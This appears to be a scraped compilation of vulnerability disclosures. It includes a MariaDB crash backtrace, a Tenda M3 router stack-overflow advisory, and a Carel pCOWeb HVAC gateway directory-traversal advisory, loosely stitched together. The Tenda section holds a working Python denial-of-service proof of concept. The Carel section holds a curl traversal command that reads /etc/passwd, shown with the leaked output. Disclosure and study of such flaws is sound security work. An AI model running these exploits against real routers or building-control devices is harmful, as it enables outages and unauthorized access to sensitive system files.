#19 0x000055cd0339d421 in mysql\_execute\_command (thd=0x62b0000bd218, is\_called\_from\_prepared\_stmt=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:3946

#20 0x000055cd033a25a1 in mysql\_parse (thd=0x62b0000bd218, rawbuf=<optimized out>, length=<optimized out>, parser\_state=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:8030

#21 0x000055cd033a860c in dispatch\_command (command=<optimized out>, thd=0x62b0000bd218, packet=<optimized out>, packet\_length=<optimized out>, blocking=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:1896

#22 0x000055cd033ad73d in do\_command (thd=0x62b0000bd218, blocking=blocking@entry=true) at /experiment/mariadb-server/sql/sql\_parse.cc:1404

#23 0x000055cd03768e57 in do\_handle\_one\_connection (connect=<optimized out>, put\_in\_cache=<optimized out>) at /experiment/mariadb-server/sql/sql\_connect.cc:1418

#24 0x000055cd0376933d in handle\_one\_connection (arg=arg@entry=0x6080000023b8) at /experiment/mariadb-server/sql/sql\_connect.cc:1312

#25 0x000055cd041f9c2c in pfs\_spawn\_thread (arg=0x617000005b98) at /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

#26 0x00007f627b7b3259 in start\_thread () from /usr/lib/libpthread.so.0

#27 0x00007f627b35e5e3 in clone () from /usr/lib/libc.so.6

(gdb) quit

CVE-2022-32088: [MDEV-26419] A SEGV in Exec_time_tracker::get_loops/Filesort_tracker::report_use/filesort

Tenda M3 V1.0.0.12 was discovered to contain a stack overflow via the listN parameter in the function fromDhcpListClient.

**Overview**

*   The device's official website: https://www.tenda.com.cn/product/M3.html
*   Firmware download website: https://www.tenda.com.cn/download/detail-3133.html

**Affected version**

V1.0.0.12(4856)

**Vulnerability details**

httpd in directory /bin has a stack overflow vulnerability. The vulnerability occurrs in the fromDhcpListClient function, which can be accessed via the URL goform/DhcpListClient

The POST parameter listN is concatenated. The program copies the POST argument without checking the length. We can set LISTEN equal to 1, the program will enter the red box, causing a stack overflow. Since the overflow overrides the LISTEN pointer variable, the atoi function will crash the program, causing a DOS attack in the second time looping.

**PoC**

Poc of Denial of Service(DoS)

import requests

data \= {
    b"LISTLEN": b"1",
    b"list1": b'A'\*0x300,
    b"page": b'A'
}
cookies \= {
    b"user": "admin"
}
res \= requests.post("http://127.0.0.1/goform/DhcpListClient", data\=data, cookies\=cookies)
print(res.content)

I use qemu-arm to emulate it. To make it work, I patched the httpd binary:

*   In the main function, The ConnectCfm function didn't work properly, so I patched it to NOP.
    
*   The R7WebsSecurityHandler function is used for permission control, and I've modified it to access URLs that can only be accessed after login.
    

In the main function, the program call the check_network function to get the IP address of the br0 interafce and use it as the listening address. So I create a iterface named br0 and configure its IP address to 127.0.0.1 .

CVE-2022-32039: IoT-vuln/Tenda/M3/fromDhcpListClient at main · d1tto/IoT-vuln

Carel pCOWeb HVAC BACnet Gateway version 2.1.0 suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the file GET parameter through the logdownload.cgi bash script is not properly verified before being used to download log files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks.

  
Carel pCOWeb HVAC BACnet Gateway 2.1.0 Unauthenticated Directory Traversal

Vendor: CAREL INDUSTRIES S.p.A.  
Product web page: https://www.carel.com  
Affected version: Firmware: A2.1.0 - B2.1.0  
                  Application Software: 2.15.4A  
                  Software version: v16 13020200

Summary: pCO sistema is the solution CAREL offers its customers for managing HVAC/R  
applications and systems. It consists of programmable controllers, user interfaces,  
gateways and communication interfaces, remote management systems to offer the OEMs  
working in HVAC/R a control system that is powerful yet flexible, can be easily interfaced  
to the more widely-used Building Management Systems, and can also be integrated into  
proprietary supervisory systems.

Desc: The device suffers from an unauthenticated arbitrary file disclosure vulnerability.  
Input passed through the 'file' GET parameter through the 'logdownload.cgi' Bash script  
is not properly verified before being used to download log files. This can be exploited  
to disclose the contents of arbitrary and sensitive files via directory traversal attacks.

=======================================================================================  
/usr/local/www/usr-cgi/logdownload.cgi:  
---------------------------------------

01: #!/bin/bash  
02:  
03: if [ "$REQUEST_METHOD" = "POST" ]; then  
04:         read QUERY_STRING  
05:         REQUEST_METHOD=GET  
06:         export REQUEST_METHOD  
07:         export QUERY_STRING  
08: fi  
09:  
10: LOGDIR="/usr/local/root/flash/http/log"  
11:  
12: tmp=${QUERY_STRING%"$"*}  
13: cmd=${tmp%"="*}  
14: if [ "$cmd" = "dir" ]; then  
15:         PATHCURRENT=$LOGDIR/${tmp#*"="}  
16: else  
17:         PATHCURRENT=$LOGDIR  
18: fi  
19:  
20: tmp=${QUERY_STRING#*"$"}  
21: cmd=${tmp%"="*}  
22: if [ "$cmd" = "file" ]; then  
23:         FILECURRENT=${tmp#*"="}  
24: else  
25:         if [ -f $PATHCURRENT/lastlog.csv.gz ]; then  
26:                 FILECURRENT=lastlog.csv.gz  
27:         else  
28:                 FILECURRENT=lastlog.csv  
29:         fi  
30: fi  
31:  
32: if [ ! -f $PATHCURRENT/$FILECURRENT ]; then  
33:         echo -ne "Content-type: text/html\r\nCache-Control: no-cache\r\nExpires: -1\r\n\r\n"  
34:         cat carel.inc.html  
35:         echo "<center>File not available!</center>"  
36:         cat carel.bottom.html  
37:         exit  
38: fi  
39:  
40: if [ -z $(echo $FILECURRENT | grep -i gz ) ]; then  
41:         if [ -z $(echo $FILECURRENT | grep -i bmp ) ]; then  
42:                 if [ -z $(echo $FILECURRENT | grep -i svg ) ]; then  
43:                         echo -ne "Content-Type: text/csv\r\n"  
44:                 else  
45:                         echo -ne "Content-Type: image/svg+xml\r\n"  
46:                 fi  
47:         else  
48:                 echo -ne "Content-Type: image/bmp\r\n"  
49:         fi  
50: else  
51:         echo -ne "Content-Type: application/x-gzip\r\n"  
52: fi  
53: echo -ne "Content-Disposition: attachment; filename=$FILECURRENT\r\n\r\n"  
54:  
55: cat $PATHCURRENT/$FILECURRENT

=======================================================================================

Tested on: GNU/Linux 4.11.12 (armv7l)  
           thttpd/2.29

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2022-5709  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5709.php

10.05.2022

--

$ curl -s http://10.0.0.3/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd

root:x:0:0:root:/root:/bin/sh  
daemon:x:1:1:daemon:/usr/sbin:/bin/false  
bin:x:2:2:bin:/bin:/bin/false  
sys:x:3:3:sys:/dev:/bin/false  
sync:x:4:100:sync:/bin:/bin/sync  
mail:x:8:8:mail:/var/spool/mail:/bin/false  
www-data:x:33:33:www-data:/var/www:/bin/false  
operator:x:37:37:Operator:/var:/bin/false  
nobody:x:65534:65534:nobody:/home:/bin/false  
guest:x:502:101::/home/guest:/bin/bash  
carel:x:500:500:Carel:/home/carel:/bin/bash  
http:x:48:48:HTTP users:/usr/local/www/http:/bin/false  
httpadmin:x:200:200:httpadmin:/usr/local/www/http:/bin/bash  
sshd:x:1000:1001:SSH drop priv user:/:/bin/false

Tag

#perl